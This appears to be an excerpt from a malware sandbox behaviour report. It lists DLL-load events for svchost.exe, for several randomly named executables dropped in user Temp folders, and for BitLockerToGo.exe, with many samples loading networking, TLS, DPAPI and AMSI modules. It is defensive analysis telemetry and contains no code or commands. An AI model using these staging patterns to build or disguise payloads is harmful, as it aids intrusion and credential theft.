Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wlidsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: clipc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gamestreamingext.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msauserext.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: tbs.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptnet.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptngc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: devobj.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptprov.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: elscore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: elstrans.dll
Source: C:\Users\user\AppData\Local\Temp\1077992001\b7b5e2e140.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1077992001\b7b5e2e140.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1077992001\b7b5e2e140.exe	Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Temp\1077992001\b7b5e2e140.exe	Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1077994001\b4fe2af6b4.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1077994001\b4fe2af6b4.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1077994001\b4fe2af6b4.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1077994001\b4fe2af6b4.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1077994001\b4fe2af6b4.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1077994001\b4fe2af6b4.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1077994001\b4fe2af6b4.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1077994001\b4fe2af6b4.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1077994001\b4fe2af6b4.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1077994001\b4fe2af6b4.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1077994001\b4fe2af6b4.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1077994001\b4fe2af6b4.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1077994001\b4fe2af6b4.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1077994001\b4fe2af6b4.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1077994001\b4fe2af6b4.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1077994001\b4fe2af6b4.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1077994001\b4fe2af6b4.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1077994001\b4fe2af6b4.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1077994001\b4fe2af6b4.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1077994001\b4fe2af6b4.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1077994001\b4fe2af6b4.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1077994001\b4fe2af6b4.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1077994001\b4fe2af6b4.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1077994001\b4fe2af6b4.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1077994001\b4fe2af6b4.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1077994001\b4fe2af6b4.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1077994001\b4fe2af6b4.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1077994001\b4fe2af6b4.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1077994001\b4fe2af6b4.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1077994001\b4fe2af6b4.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1077994001\b4fe2af6b4.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1077994001\b4fe2af6b4.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1077994001\b4fe2af6b4.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1077994001\b4fe2af6b4.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1077994001\b4fe2af6b4.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1077994001\b4fe2af6b4.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1077994001\b4fe2af6b4.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1077994001\b4fe2af6b4.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1077996001\976cb97ff6.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1077996001\976cb97ff6.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1077996001\976cb97ff6.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1077996001\976cb97ff6.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: windows.storage.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: wldp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: winhttp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: webio.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: mswsock.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: winnsi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: sspicli.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: dnsapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: schannel.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ntasn1.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ncrypt.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: msasn1.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: cryptsp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: rsaenh.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: cryptbase.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: gpapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1077998001\14b550e5e3.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1077998001\14b550e5e3.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1077998001\14b550e5e3.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1077998001\14b550e5e3.exe	Section loaded: powrprof.dll
